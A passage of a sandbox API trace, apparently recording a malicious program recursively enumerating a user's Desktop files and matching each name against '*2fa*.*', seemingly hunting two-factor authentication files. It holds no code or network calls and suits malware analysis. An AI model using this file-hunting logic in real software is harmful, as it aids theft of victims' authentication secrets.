lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.837] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaba0 [0110.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaba0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.837] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaba0 | out: hHeap=0x29a0000) returned 1 [0110.837] PathMatchSpecW (pszFile="fmnAnasf2I.mp4", pszSpec="*2fa*.*") returned 0 [0110.837] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.837] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8f0a80, ftCreationTime.dwHighDateTime=0x1d7adf4, ftLastAccessTime.dwLowDateTime=0xc336cc10, ftLastAccessTime.dwHighDateTime=0x1d7ae1a, ftLastWriteTime.dwLowDateTime=0xc336cc10, ftLastWriteTime.dwHighDateTime=0x1d7ae1a, nFileSizeHigh=0x0, nFileSizeLow=0x187f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="g3fX8Y8-txe9_Es.m4a", cAlternateFileName="G3FX8Y~1.M4A")) returned 1 [0110.837] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.837] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.837] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a" [0110.837] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.837] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.837] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea218 [0110.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x38ea218, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.837] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2f18 [0110.837] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea218 | out: hHeap=0x29a0000) returned 1 [0110.837] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.837] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aabd0 [0110.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aabd0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.837] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabd0 | out: hHeap=0x29a0000) returned 1 [0110.837] PathMatchSpecW (pszFile="g3fX8Y8-txe9_Es.m4a", pszSpec="*2fa*.*") returned 0 [0110.837] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2f18 | out: hHeap=0x29a0000) returned 1 [0110.837] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2f3aea0, ftCreationTime.dwHighDateTime=0x1d7acc6, ftLastAccessTime.dwLowDateTime=0xe973a3a0, ftLastAccessTime.dwHighDateTime=0x1d7ad14, ftLastWriteTime.dwLowDateTime=0xe973a3a0, ftLastWriteTime.dwHighDateTime=0x1d7ad14, nFileSizeHigh=0x0, nFileSizeLow=0x15d9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Izq83dPIx.mp4", cAlternateFileName="IZQ83D~1.MP4")) returned 1 [0110.837] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.837] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.838] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Izq83dPIx.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4" [0110.838] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.838] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.838] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", lpUsedDefaultChar=0x0) returned 45 [0110.838] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.838] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.838] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.838] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaba0 [0110.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaba0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.838] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaba0 | out: hHeap=0x29a0000) returned 1 [0110.838] PathMatchSpecW (pszFile="Izq83dPIx.mp4", pszSpec="*2fa*.*") returned 0 [0110.838] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.838] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6dde030, ftCreationTime.dwHighDateTime=0x1d7a99c, ftLastAccessTime.dwLowDateTime=0x51405ab0, ftLastAccessTime.dwHighDateTime=0x1d7aeb3, ftLastWriteTime.dwLowDateTime=0x51405ab0, ftLastWriteTime.dwHighDateTime=0x1d7aeb3, nFileSizeHigh=0x0, nFileSizeLow=0x12d9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="k8k6qCAjWYmc.odt", cAlternateFileName="K8K6QC~1.ODT")) returned 1 [0110.838] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.838] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.838] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt" [0110.838] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.838] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0110.838] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x39700d0, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", lpUsedDefaultChar=0x0) returned 48 [0110.838] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.838] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.839] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.839] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac78 [0110.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aac78, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.839] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac78 | out: hHeap=0x29a0000) returned 1 [0110.839] PathMatchSpecW (pszFile="k8k6qCAjWYmc.odt", pszSpec="*2fa*.*") returned 0 [0110.839] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.839] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KTOu", cAlternateFileName="")) returned 1 [0110.839] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.839] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.839] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.839] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.839] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.840] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0110.840] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.840] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.840] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\." [0110.840] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.840] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.840] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.840] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.840] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.840] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.." [0110.840] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.840] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.841] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f265de0, ftCreationTime.dwHighDateTime=0x1d7acc3, ftLastAccessTime.dwLowDateTime=0xe01b3e80, ftLastAccessTime.dwHighDateTime=0x1d7af08, ftLastWriteTime.dwLowDateTime=0xe01b3e80, ftLastWriteTime.dwHighDateTime=0x1d7af08, nFileSizeHigh=0x0, nFileSizeLow=0xd048, dwReserved0=0x0, dwReserved1=0x0, cFileName="3CEoMqDCJmINqN85E.bmp", cAlternateFileName="3CEOMQ~1.BMP")) returned 1 [0110.841] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.841] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.841] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.841] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.841] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.841] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a28e8 [0110.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x29a28e8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", lpUsedDefaultChar=0x0) returned 58 [0110.841] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2db0 [0110.841] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28e8 | out: hHeap=0x29a0000) returned 1 [0110.841] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.841] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aab40 [0110.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aab40, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.841] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab40 | out: hHeap=0x29a0000) returned 1 [0110.841] PathMatchSpecW (pszFile="3CEoMqDCJmINqN85E.bmp", pszSpec="*2fa*.*") returned 0 [0110.841] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2db0 | out: hHeap=0x29a0000) returned 1 [0110.841] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1872110, ftCreationTime.dwHighDateTime=0x1d7a92f, ftLastAccessTime.dwLowDateTime=0xbc62b500, ftLastAccessTime.dwHighDateTime=0x1d7ace6, ftLastWriteTime.dwLowDateTime=0xbc62b500, ftLastWriteTime.dwHighDateTime=0x1d7ace6, nFileSizeHigh=0x0, nFileSizeLow=0x3ae1, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUCY-_yVF.swf", cAlternateFileName="EUCY-_~1.SWF")) returned 1 [0110.841] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.841] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.841] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf" [0110.841] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.841] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.841] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea458 [0110.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x38ea458, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", lpUsedDefaultChar=0x0) returned 50 [0110.842] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0110.842] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea458 | out: hHeap=0x29a0000) returned 1 [0110.842] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.842] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaaf8 [0110.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aaaf8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.842] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.842] PathMatchSpecW (pszFile="eUCY-_yVF.swf", pszSpec="*2fa*.*") returned 0 [0110.842] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.842] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f2e50, ftCreationTime.dwHighDateTime=0x1d7b054, ftLastAccessTime.dwLowDateTime=0xe568fc80, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xe568fc80, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xb99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HLPCM ND3Cl3FgAs3.mp4", cAlternateFileName="HLPCMN~1.MP4")) returned 1 [0110.842] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.842] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.842] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.842] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.842] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.842] lstrcatW (in: lpString1="\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.842] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.842] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a2ae0 [0110.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x29a2ae0, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 